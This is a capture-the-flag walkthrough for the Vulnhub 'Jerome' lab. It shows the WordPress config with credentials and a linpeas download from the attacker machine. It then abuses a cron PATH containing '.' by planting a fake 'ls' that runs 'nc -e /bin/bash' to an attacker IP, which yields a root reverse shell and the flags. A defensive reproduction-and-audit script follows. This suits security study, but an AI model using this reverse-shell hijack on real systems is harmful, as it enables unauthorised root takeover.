index.php       wp-comments-post.php  wp-links-opml.php  wp-trackback.php
license.txt     wp-config-sample.php  wp-load.php        xmlrpc.php
readme.html     wp-config.php         wp-login.php
jerome@jerome:/var/www/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'jerome');

/** MySQL database password */
define('DB_PASSWORD', 'jerome');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');
define('AUTH_SALT',        'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT',   'put your unique phrase here');
define('NONCE_SALT',       'put your unique phrase here');
define('WP_AUTO_UPDATE_CORE', false);

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
        define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
jerome@jerome:/var/www/html/wordpress$ cd /home
cd /home
jerome@jerome:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root   root   4.0K Apr 16  2019 .
drwxr-xr-x 22 root   root   4.0K Mar 31  2019 ..
drwxr-xr-x  4 jerome jerome 4.0K Apr 20  2019 jerome
jerome@jerome:/home$ cd jerome
cd jerome
jerome@jerome:/home/jerome$ ls -alh
ls -alh
total 32K
drwxr-xr-x 4 jerome jerome 4.0K Apr 20  2019 .
drwxr-xr-x 3 root   root   4.0K Apr 16  2019 ..
-rw-r--r-- 1 jerome jerome  220 Apr 16  2019 .bash_logout
-rw-r--r-- 1 jerome jerome 3.7K Apr 16  2019 .bashrc
drwx------ 2 jerome jerome 4.0K Apr 16  2019 .cache
drwxrwxr-x 3 jerome jerome 4.0K Apr 16  2019 .local
-rw-r--r-- 1 jerome jerome  807 Apr 16  2019 .profile
-rw-r--r-- 1 jerome jerome    0 Apr 16  2019 .sudo_as_admin_successful
-rw-r--r-- 1   1001   1001   12 Apr 12  2019 flag.txt
jerome@jerome:/home/jerome$ cat flag.txt
cat flag.txt
b0ed001c825
jerome@jerome:/home/jerome$ sudo -l
sudo -l
[sudo] password for jerome: jerome

Sorry, try again.
[sudo] password for jerome: jerome

Sorry, try again.
[sudo] password for jerome: jerome

sudo: 3 incorrect password attempts
jerome@jerome:/home/jerome$ 

Privilege escalation

Upload linpeas.sh to /tmp on the target, make it executable, and run it:

jerome@jerome:/home/jerome$ cd /tmp
cd /tmp
jerome@jerome:/tmp$ wget http://192.168.56.206:8000/linpeas.sh
wget http://192.168.56.206:8000/linpeas.sh
--2022-12-31 05:47:53--  http://192.168.56.206:8000/linpeas.sh
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765823 (748K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 747.87K  --.-KB/s    in 0.002s  

2022-12-31 05:47:53 (306 MB/s) - 'linpeas.sh' saved [765823/765823]

jerome@jerome:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
jerome@jerome:/tmp$ ./linpeas.sh

The following part of the output stood out:

╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path                                         
/usr/bin/gettext.sh   

But that led nowhere. The crontab is more interesting:

jerome@jerome:/tmp$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=.:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
@reboot         root    /bin/bash /usr/share/simulate.sh
@reboot         root    dhclient
jerome@jerome:/tmp$ 

jerome@jerome:/tmp$ cat /usr/share/simulate.sh
cat /usr/share/simulate.sh
#
# This script simulates human behaviour from the root account
#

while true
do
    cd /home/jerome;
    ls;
    sleep 120;
done
jerome@jerome:/tmp$ ls -alh /usr/share/simulate.sh
ls -alh /usr/share/simulate.sh
-rwxr-xr-x 1 root root 130 Apr 16  2019 /usr/share/simulate.sh

simulate.sh is started by cron as root and, in its loop, does cd /home/jerome and then calls ls by its bare name rather than an absolute path. The PATH defined in /etc/crontab starts with `.`, so the shell resolves ls by looking in the current directory first, and that current directory is /home/jerome, which jerome can write to. Planting a file named ls in /home/jerome that launches a reverse shell therefore gets it executed as root on the next iteration of the loop. Nothing needs to be changed in our own PATH; our shell's environment has no effect on root's cron process anyway:

jerome@jerome:/home/jerome$ ls
ls
flag.txt
jerome@jerome:/home/jerome$ ls -alh
ls -alh
total 36K
drwxr-xr-x 4 jerome jerome 4.0K Dec 31 06:07 .
drwxr-xr-x 3 root   root   4.0K Apr 16  2019 ..
-rw------- 1 jerome jerome  531 Dec 31 06:07 .bash_history
-rw-r--r-- 1 jerome jerome  220 Apr 16  2019 .bash_logout
-rw-r--r-- 1 jerome jerome 3.7K Apr 16  2019 .bashrc
drwx------ 2 jerome jerome 4.0K Apr 16  2019 .cache
drwxrwxr-x 3 jerome jerome 4.0K Apr 16  2019 .local
-rw-r--r-- 1 jerome jerome  807 Apr 16  2019 .profile
-rw-r--r-- 1 jerome jerome    0 Apr 16  2019 .sudo_as_admin_successful
-rw-r--r-- 1   1001   1001   12 Apr 12  2019 flag.txt
jerome@jerome:/home/jerome$ echo "nc -e /bin/bash 192.168.56.206 9999" >> ls
echo "nc -e /bin/bash 192.168.56.206 9999" >> ls
jerome@jerome:/home/jerome$ chmod 777 
chmod 777
chmod: missing operand after '777'
Try 'chmod --help' for more information.
jerome@jerome:/home/jerome$ chmod 777 ls
chmod 777 ls
jerome@jerome:/home/jerome$ 

The loop sleeps 120 seconds between iterations, so within two minutes the listener on Kali Linux receives the reverse shell running as root (the listener must already be up when the planted ls runs; nc -e also requires a netcat build that supports -e, which the target has):

┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ sudo nc -nlvp 9999
listening on [any] 9999 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.219] 39892
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -alh
total 36K
drwx------  3 root root 4.0K Apr 20  2019 .
drwxr-xr-x 22 root root 4.0K Mar 31  2019 ..
-rw-------  1 root root  607 Apr 20  2019 .bash_history
-rw-r--r--  1 root root 3.1K Apr 13  2019 .bashrc
-rw-------  1 root root   11 Apr 12  2019 flag.txt
drwxr-xr-x  3 root root 4.0K Mar 31  2019 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root   12 Apr 20  2019 .python_history
-rw-r--r--  1 root root   66 Apr  3  2019 .selected_editor
cat flag.txt
f60532cf8a
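
The following is an added example, not part of the original write-up, that reproduces the cron PATH hijack in a scratch directory, shows the two fixes (drop `.` from PATH, or call /bin/ls by absolute path), and adds a small check for crontab-style files whose PATH searches the current directory. All file names, the planted ls (which only drops a marker where the real attack used nc -e /bin/bash) and the sample crontab are constructed for the demo; nothing under /etc or /home is touched.

```shell
#!/bin/sh
# Added example (not from the original write-up): reproduce the simulate.sh PATH
# hijack in a scratch directory and show the two fixes, plus a small audit for
# crontabs whose PATH searches the current directory. All paths and names below
# are constructed for the demo; nothing under /etc or /home is touched.

# Return 0 (true) if any PATH component is '.', empty, or relative, i.e. if the
# shell would search the current working directory when resolving a command.
path_has_cwd_entry() {
    rest="$1:"
    while [ -n "$rest" ]; do
        comp=${rest%%:*}
        rest=${rest#*:}
        case "$comp" in
            /*) ;;            # absolute directory: fine
            *)  return 0 ;;   # '.', '' or 'bin': resolved relative to cwd
        esac
    done
    return 1
}

# Print every PATH= assignment in a crontab-style file that searches the cwd.
# Returns 0 if at least one was found, 1 otherwise.
audit_crontab_file() {
    found=1
    while IFS= read -r line; do
        case "$line" in
            PATH=*)
                val=${line#PATH=}
                val=${val#\"}; val=${val%\"}
                if path_has_cwd_entry "$val"; then
                    printf 'cwd-searchable PATH in %s: %s\n' "$1" "$line"
                    found=0
                fi ;;
        esac
    done < "$1"
    return $found
}

# Run a stand-in for simulate.sh (cd into a user-writable dir, then call ls)
# with the given PATH and the given way of naming ls. Prints "hijacked" if the
# planted ls executed, "safe" otherwise.
run_simulation() {
    cron_path=$1     # PATH the cron job runs with
    ls_cmd=$2        # "ls" (as in simulate.sh) or "/bin/ls"
    work=$(mktemp -d)
    # the user's directory, standing in for /home/jerome, with a planted 'ls'
    # that just drops a marker where the real attack used nc -e /bin/bash
    printf '#!/bin/sh\n: > "%s/marker"\n' "$work" > "$work/ls"
    chmod 755 "$work/ls"
    # the root-owned script: one iteration of simulate.sh's loop
    printf 'cd "%s"; %s >/dev/null\n' "$work" "$ls_cmd" > "$work/simulate.sh"
    PATH="$cron_path" /bin/sh "$work/simulate.sh"
    if [ -e "$work/marker" ]; then echo hijacked; else echo safe; fi
    rm -rf "$work"
}

# The PATH line seen in the target's /etc/crontab, and a corrected one
CRON_PATH_VULN='.:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin'
CRON_PATH_FIXED='/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin'

# Demo: a constructed crontab carrying the vulnerable PATH line
demo_crontab=$(mktemp)
printf 'SHELL=/bin/sh\nPATH=%s\n@reboot root /bin/bash /usr/share/simulate.sh\n' \
    "$CRON_PATH_VULN" > "$demo_crontab"
audit_crontab_file "$demo_crontab" || echo "crontab PATH looks sane"
rm -f "$demo_crontab"

echo "cron PATH with '.', unqualified ls:    $(run_simulation "$CRON_PATH_VULN" ls)"
echo "cron PATH without '.', unqualified ls: $(run_simulation "$CRON_PATH_FIXED" ls)"
echo "cron PATH with '.', /bin/ls:           $(run_simulation "$CRON_PATH_VULN" /bin/ls)"
```

Either fix alone is enough to defeat the planted ls, but in practice root's scripts should do both: set an explicit PATH of absolute, root-owned directories at the top of the script and never cd into a directory another user can write to before running anything. The audit function can be pointed at /etc/crontab and the files in /etc/cron.d on a real host; an empty component (a leading, trailing or doubled colon) is reported as well, since the shell treats it like `.`.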

Lessons learned

  1. In Metasploit the PROXIES option is not a URL but type:host:port, with no // in it.

  2. When a script running as root invokes a command by a relative name, and a directory the attacker can write to is searched first (here `.` at the head of cron's PATH, combined with the script's cd into the user's own home directory), planting a same-named file that launches a reverse shell yields a root shell.

  3. In Metasploit, when RHOSTS is the local machine, set it to 127.0.0.1 rather than localhost.

From: https://www.cnblogs.com/jason-huawen/p/17016497.html
